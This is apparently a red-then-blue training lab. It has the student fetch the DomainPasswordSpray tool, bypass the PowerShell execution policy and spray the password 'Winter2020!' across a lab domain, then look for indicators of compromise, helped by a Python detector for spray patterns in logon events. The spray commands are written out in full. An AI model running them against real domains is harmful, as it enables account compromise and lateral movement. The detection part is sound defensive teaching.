Password sprays are a very common method used for lateral movement. In this lab, the student will execute a password spray against the domain. Once the password spray is completed, the student will search for indicators of compromise.
Procure the Domain Password Spray tools and execute the Password Spray. After executing the Password Spray and identifying a valid user account and password, begin the hunt for Indicators of Compromise. While hunting, determine the full scope of the Password Spray attack.
Log in to the Member Server, WS01, and download the components from GitHub.
Connect via Remote Desktop to the Member Server, WS01.
Launch Windows PowerShell from the Windows Start Menu.
First, confirm the correct user and system context by using the "whoami" and "hostname" commands.
whoami
hostname
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01 <-----------------------------------VERIFY RESULT
If the result of the above commands differs, please confirm you are operating on the correct system and user context.
We will now use Invoke-WebRequest to download the DomainPasswordSpray tool.
Enable TLS 1.2 for Invoke-WebRequest; this is necessary because TLS 1.2 is not enabled by default for Invoke-WebRequest on Windows Server 2016. The command returns to the PowerShell prompt without any output. This is expected. The change persists only for this PowerShell session.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Use Invoke-WebRequest to download the necessary components. The command downloads the package from the URI specified and saves it to the filename specified with the -OutFile flag; the two commands that follow change into the Downloads folder and extract the archive.
Invoke-WebRequest -URI "https://github.com/dafthack/DomainPasswordSpray/archive/master.zip" -OutFile "~\Downloads\master.zip"
cd ~\Downloads\
Expand-Archive "master.zip"
With the tools now extracted in the Downloads folder, and a PowerShell session launched in the appropriate folder, move to the next section of the lab to execute the malware.
The commands below, run in PowerShell, execute a password spray against the domain environment. Note that Set-ExecutionPolicy Bypass is only needed so the unsigned module script can be imported.
cd ~\Downloads\master\DomainPasswordSpray-master
Set-ExecutionPolicy Bypass -Force
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Winter2020! -Force
You have successfully procured the Domain Password Spray tool and executed it against the local domain.
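Before moving to the blue section, the following added example (not part of the lab's own material) shows the shape a hunter looks for in the domain controller's failed-logon events: one source host failing against many distinct accounts in a short window, with only one or two attempts per account, followed by a successful logon from that same source. The records are constructed to mimic Windows Security events 4625 (failed logon) and 4624 (successful logon); the hostnames and account names are made up.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records shaped like Windows Security events:
# (timestamp, event_id, target_user, source_host). 4625 = failed logon,
# 4624 = successful logon. Names and hosts are made up for this example.
SAMPLE_EVENTS = [
    ("2020-01-15T09:00:01", 4625, "alice",   "WS01"),
    ("2020-01-15T09:00:02", 4625, "bob",     "WS01"),
    ("2020-01-15T09:00:02", 4625, "carol",   "WS01"),
    ("2020-01-15T09:00:03", 4625, "dave",    "WS01"),
    ("2020-01-15T09:00:04", 4625, "erin",    "WS01"),
    ("2020-01-15T09:00:05", 4625, "frank",   "WS01"),
    ("2020-01-15T09:00:30", 4624, "itadmin", "WS01"),  # success after the spray
    ("2020-01-15T09:05:00", 4625, "grace",   "WS02"),  # ordinary mistyped password
    ("2020-01-15T09:05:07", 4625, "grace",   "WS02"),
]

def parse(events):
    return [(datetime.fromisoformat(ts), eid, user, host) for ts, eid, user, host in events]

def find_sprays(events, window=timedelta(minutes=5), min_accounts=5, max_per_account=2):
    """Flag sources that fail logons against many distinct accounts inside one window,
    with few attempts per account: the spray shape, not a single locked-out user."""
    failures = defaultdict(list)
    for ts, eid, user, host in parse(events):
        if eid == 4625:
            failures[host].append((ts, user))
    findings = []
    for host, items in failures.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            per_account = defaultdict(int)
            for t, u in items[i:]:
                if t - start <= window:
                    per_account[u] += 1
            if len(per_account) >= min_accounts and max(per_account.values()) <= max_per_account:
                findings.append({"source": host, "start": start, "accounts": sorted(per_account)})
                break  # one finding per source is enough to open the investigation
    return findings

def successes_after_spray(events, findings):
    """Successful logons (4624) from a flagged source after the spray began:
    the candidate compromised accounts that define the incident's scope."""
    flagged = {f["source"]: f["start"] for f in findings}
    return [(host, user) for ts, eid, user, host in parse(events)
            if eid == 4624 and host in flagged and ts >= flagged[host]]
```

Tune the thresholds to the domain's lockout policy: a spray that stays under the lockout threshold will show at most that many failures per account, which is exactly why counting distinct accounts per source matters more than counting failures per account.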
Continue on to L1140-Blue to hunt for indicators of compromise.